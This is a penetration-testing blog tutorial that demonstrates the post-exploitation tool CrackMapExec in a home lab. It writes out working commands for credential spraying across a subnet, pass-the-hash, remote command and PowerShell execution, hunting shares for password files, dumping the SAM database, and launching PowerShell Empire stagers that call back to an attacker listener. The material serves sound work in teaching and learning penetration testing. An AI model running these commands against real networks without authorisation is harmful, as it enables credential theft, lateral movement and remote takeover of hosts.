Bow Before the All Powerful CrackMapExec!!

There are many other blogs covering CrackMapExec as well as the official GitHub documentation, so why am I writing this article?  Much like all of our other blogs on BestestRedTeam it is mostly to help those who want to learn from our blog as well as learning opportunities for the authors to discover new technologies, and techniques. Hope you enjoy!

CrackMapExec more commonly referenced as CME is a post-exploitation tool that helps automate assessing the security of Active Directory networks. The CME tool was built by the infamous byt3bl33d3r.  Built with stealth in mind, CME follows the concept of "Living off the Land" (LotL).  Attackers who use LotL tactics use trusted off-the-shelf and preinstalled system tools to carry out their work. It might not be obvious, but there are more than 100 Windows system tools that can be used by cyber attackers for nefarious purposes.  Cyber attackers have been utilizing these tools for a few reasons, often in an effort to hide their activity.  Hoping their malicious activity will be hidden in a sea of legitimate processes. Using these LotL processes CME abuses built-in Active Directory features/protocols to own networks and dig through sensitive information, all while evading most off-the-shelf AV/IDS/IPS.  

byt3bl33d3r informs users on his GitHub page that CME makes heavy use of the Impacket library (developed by @asolino) and the PowerSploit Toolkit (developed by @mattifestation) for working with network protocols and performing a variety of post-exploitation techniques.

Following along with the installation instructions on the GitHub page say that CME can be installed via aptitude repository, but I have found that "stable" in this case means out of date, and therefore I recommend installing from the GitHub source. Additionally, the GitHub instructions recommend installing this within a python environment or pipenv, however since I tear down my Kali images so often I chose not to do that.  If pipenv is required, consider reading the installation instructions linked above.

#~ apt-get install -y libssl-dev libffi-dev python-dev build-essential
#~ git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
#~ cd CrackMapExec
#~ python setup.py install

Now that CME is installed you can use the tool to enumerate the network of live Windows hosts.  Note that CME is primarily used as a post exploitation tool, and gaining credentials will need to be performed other ways to begin with.  For demonstration purposes I will be using a Windows 7 x64 Home edition machine that is installed with Symantec Endpoint Protection (hence the name SEPTest). However, for peace of mind and continuity I have disabled SEP for this blog post. Evading AV can, and hopefully will be an entirely different blog post.  Keep in mind, that for Windows 7 home edition the Administrator account is by default disabled, and will have to be enabled in order to perform these tests.  Final note, please be aware that this blog post took sometime and IP addresses changed throughout the screenshot taking phases.  

For demonstration of this blog post I ran Responder on my Kali machine and caught some broadcast traffic from the Windows 7 box, which had a very easily cracked password. From there I will demonstrate the ability of CME.   Also for this blog post I will be focusing on the SMB protocol, however CME does offer others such as winrm, http, etc.  

Find live hosts 
#~ cme smb 192.168.1.0/24

Or generate a list of live hosts
#~ cme smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt

Once you have a live list of hosts the following checks will attempt authentication to the entire /24, though a single target may also be used.  Using the full /24 could help to see where else this username and password has access to.  

#~ cme smb 192.168.1.0/24 -u username -p 'password'

CME will also allow you to perform Pass the Hash PtH attacks.   Please keep in mind that you will need NTLM hashes, as NTLMv2 is not able to be passed.  

#~ cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'

As you can see in the screenshots above the failed logins result in a [-] whereas, the successful logins result in a [+] Domain\Username:Password.  

Local admin access results in a (Pwn3d!) added after the login confirmation, shown below.  Remember you need local admin access to inject into valid processes with WMI, SMB, etc.

CME also allows for command execution with valid credentials.   For example in the screenshot below I am using the valid credentials to execute a whoami and ipconfig command.  

#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami
SMB         192.168.10.11    445    WIN7BOX         [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7BOX) (domain:LAB) (signing:False) (SMBv1:True)
SMB         192.168.10.11    445    WIN7BOX         [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
SMB         192.168.10.11    445    WIN7BOX         [+] Executed command 
SMB         192.168.10.11    445    WIN7BOX         lab\administrator

Or if you would prefer to execute Powershell commands directly you can use the uppercase letter X.  

#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'

CME is also helpful to dig through shares or drives once you have a foothold on the network.  For example I could run cme smb x.x.x.x -u 'user' -p 'pass' --spider C\$ --pattern <pattern> to dig for certain names of files.  In the screenshot below I created a text file called password.txt hidden in the C drive and CME did not take long at all to discover it.  You can also use the --content flag to search within the files for patterns.  Take note this will add extra time and resources to complete.

You can even use CME to dump the local SAM database by using the --sam option.

There are many different options built into CME, but ff all of the above is not enough to convince you to add this to your toolbelt, the modules that are packaged with CME will. Listing the available modules can be performed with the -L flag after the protocol.  

#~ cme smb -L
[*] met_inject                Downloads the Meterpreter stager and injects it into memory
[*] get_keystrokes            Logs keys pressed, time and the active window
[*] empire_exec               Uses Empire's RESTful API to generate a launcher for the specified listener and executes it

-- SNIP --

Then the module can be executed with the following syntax:

cme <protocol> <target(s)> -M <module name>

Not sure what options are needed?  Just use the --options with the module command.

cme smb -M mimikatz --options

Even better, let's make it rain shells!  The following module will use CME to launch a Powershell Empire stager. For this blog post I will not be going through the setup phase of Powershell Empire, but will be focusing on how to start Empire to catch CME stagers.

Couple of notes about the staging below, you need to use a port that will not have any conflicts.  Next make sure to set the Host option after the Port otherwise it will not update the port.  Finally, make sure that CertPath is a folder that contains both the public and private key needed for encryption.  It is not well documented, but it needs the folder and not the files.  

(Empire: listeners) > set Name test
(Empire: listeners) > set Port 9090
(Empire: listeners) > set Host 192.168.10.3
(Empire: listeners) > set CertPath data/
(Empire: listeners) > excute
(Empire: listeners) >
#~ python empire --rest --user empireadmin --pass Password123!

[*] Loading modules from: /root/Downloads/Empire/lib/modules/
 * Starting Empire RESTful API on port: 1337
 * RESTful API token: <long string>
 * Running on https://0.0.0.0:1337/ (Press CTRL+C to quit)

If you want to set your own username and password for the Empire stager you can change the settings of CME at ~/.cme/cme.conf

[Empire]
api_host=127.0.0.1
api_port=1337
username=empireadmin
password=Password123!

[Metasploit]
rpc_host=127.0.0.1
rpc_port=55552
password=abc123

Now the final step is to run the empire_exec module inside CME.  

#~ crackmapexec 192.168.10.0/24 -u username -p password -M empire_exec -o LISTENER=<listener name>

What happened next will shock you... Nothing.  For some reason I cannot for the life of me get the Empire stager to call back to my machine.  I have attempted to manually run the Powershell command for the call back with no success.  I have turned off all AV and made sure the Firewall wasn't blocking traffic.  I will need to continue to investigate this issue, but I do not want to hold this blog up any further, therefore I hope this helps when performing an internal penetration test in the future.  Until next time keep on hacking!